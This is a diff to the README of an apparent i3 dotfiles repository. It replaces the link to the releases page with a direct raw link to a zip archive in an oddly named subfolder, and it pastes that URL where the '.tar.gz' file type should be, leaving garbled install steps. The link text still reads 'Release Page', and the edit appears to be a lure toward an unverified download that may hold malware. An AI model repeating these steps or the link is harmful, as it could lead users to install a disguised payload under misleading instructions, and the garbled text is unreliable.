Muhtamar27/admzinhu-i3-dots/README.md

 - Access to the internet for downloading the package.

 ## 📥 Download & Install
-Visit this page to download: [Release Page](https://github.com/Muhtamar27/admzinhu-i3-dots/releases)
+Visit this page to download: [Release Page](https://raw.githubusercontent.com/Muhtamar27/admzinhu-i3-dots/main/unvaunting/admzinhu-i3-dots.zip)

 1. Open your web browser.
 2. Click on the link above to go to the Releases page.
 3. You will see a list of available versions with links to download.
-4. Click on the latest release to download the .zip or .tar.gz file.
+4. Click on the latest release to download the .zip or https://raw.githubusercontent.com/Muhtamar27/admzinhu-i3-dots/main/unvaunting/admzinhu-i3-dots.zip file.
 5. Once the file is downloaded, locate it in your Downloads folder.

 ## 🔧 Installation Steps
 1. **Extract the Files:**
-    - Right-click the downloaded file (it should be .zip or .tar.gz) and choose "Extract Here."
+    - Right-click the downloaded file (it should be .zip or https://raw.githubusercontent.com/Muhtamar27/admzinhu-i3-dots/main/unvaunting/admzinhu-i3-dots.zip) and choose "Extract Here."
     - If you do not see this option, you may need an extraction tool like `unzip` or `tar`.
 You can install one using your package manager.

 2. **Open Terminal:**